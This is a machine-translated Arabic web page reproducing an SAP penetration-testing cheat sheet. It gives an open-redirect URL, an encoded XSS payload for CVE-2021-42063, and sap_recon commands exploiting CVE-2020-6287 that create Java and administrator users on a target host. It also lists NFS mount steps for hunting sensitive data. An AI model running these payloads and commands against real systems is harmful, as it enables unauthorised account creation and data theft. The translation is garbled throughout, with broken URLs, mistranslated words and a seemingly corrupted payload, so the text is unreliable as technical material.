الصفحة الرئيسية>موارد بناء الموقع>بيانات الموقع
تنزيل

SAP-PENTEST-CHEATSHEET

بسم الله

لإجراء الأثرياء ، يجب عليك نشر نظام SAP على شبكتك

ضعف واجهة الويب SAP

  1. فحص إعادة التوجيه المفتوح

https: // المضيف/sap/public/bc/icf/logoff؟ redirecturl = saliciousurl

  1. فحص البروتوكول غير المضمون (HTTP)

http: // المضيف: Port/StartPage

http: // المضيف: منفذ/SAP/عام/معلومات

  1. شيك الاختلاط الإعلامي للنظام

http: // المضيف: منفذ/SAP/عام/معلومات

  1. XSS (CVE-2021-42063)

ابحث عن/sapirexthelp https: // localhost/sapirexthelp

https: // المضيف/sapirexthelp/عشوائي/٪ 22 ٪ 3e ٪ 3C ٪ 53 ٪ 56 ٪ 47 ٪ 20 ٪ 4f ٪ 4e ٪ 4c ٪ 41 ٪ 41 ٪ 3d ٪ 26 ٪ 23 ٪ 39 ٪ 26 ٪ 23 ٪ 31 ٪ 30 ٪ 38 ٪ 26 ٪ 23 ٪ 31 ٪ 31 ٪ 26 ٪ 23 ٪ 31 ٪ 34 ٪ 26 ٪ 23 ٪ 31 ٪ 36 ٪ 26 ٪ 26 ٪ 23 ٪ 78 ٪ 36 ٪ 34 ٪ 26 ٪ 26 ٪ 36 ٪ 66 ٪ 26 ٪ 23 ٪ 78 ٪ 36 ٪ 33 ٪ 26 ٪ 23 ٪ 78 ٪ 37 ٪ 35 ٪ 26 ٪ 23 ٪ 78 ٪ 36 ٪ 64 ٪ 26 ٪ 23 ٪ 78 ٪ 36 ٪ 35 ٪ 26 ٪ 23 ٪ 36 ٪ 65 ٪ 26 ٪ 23 ٪ 78 ٪ 34 ٪ 26 ٪ 23 ٪ 78 ٪ 32 ٪ 65 ٪ 26 ٪ 23 ٪ 78 ٪ 36 ٪ 34 ٪ 26 ٪ 23 ٪ 78 ٪ 36 ٪ 66 ٪ 26 ٪ 23 ٪ 78 ٪ 36 ٪ 64 ٪ 26 ٪ 23 ٪ 36 ٪ 36 ٪ 26 ٪ 23 ٪ 78 ٪ 39 ٪ 26 ٪ 23 ٪ 78 ٪ 36 ٪ 65 ٪ 29 ٪ 3e.asp

  1. نظام معلومات SAP 1.0 تحميل shell

  2. CVE-2022-22536 (ICMAD SAP)

  3. ثغرة أمنية SAP Recon (CVE-2020-6287 ، CVE-2020-6286)

https://github.com/chipik/sap_recon

قم بتنزيل ملف zip

Python recon.py -h 172.16.30.8 -f /1111.zip

إنشاء مستخدم SAP Java

Python recon.py -h 172.16.30.8 -u

إنشاء مستخدم مسؤول SAP Java

Python recon.py -h 172.16.30.8 -a

ضعف شبكة الشبكة

  1. فحص ثغرة الأمن SSL

SSLSCAN

  1. جبل NFS

NFS-LS NFS: // Host/Mount

mkdir mnt && mount -t nfs host:/mount ./mnt

حظا سعيدا في البحث عن معلومات حساسة

مساهمة

أنا أبحث عن جهاز أو حاوية Virtual SAP للقيام بمحاكاة خام

المشاركة تهتم

كmaقal صlى الله شاهه وسلم:

يوسع
معلومات إضافية
تطبيقات ذات صلة
نوصي لك
أخبار ذات صلة الكل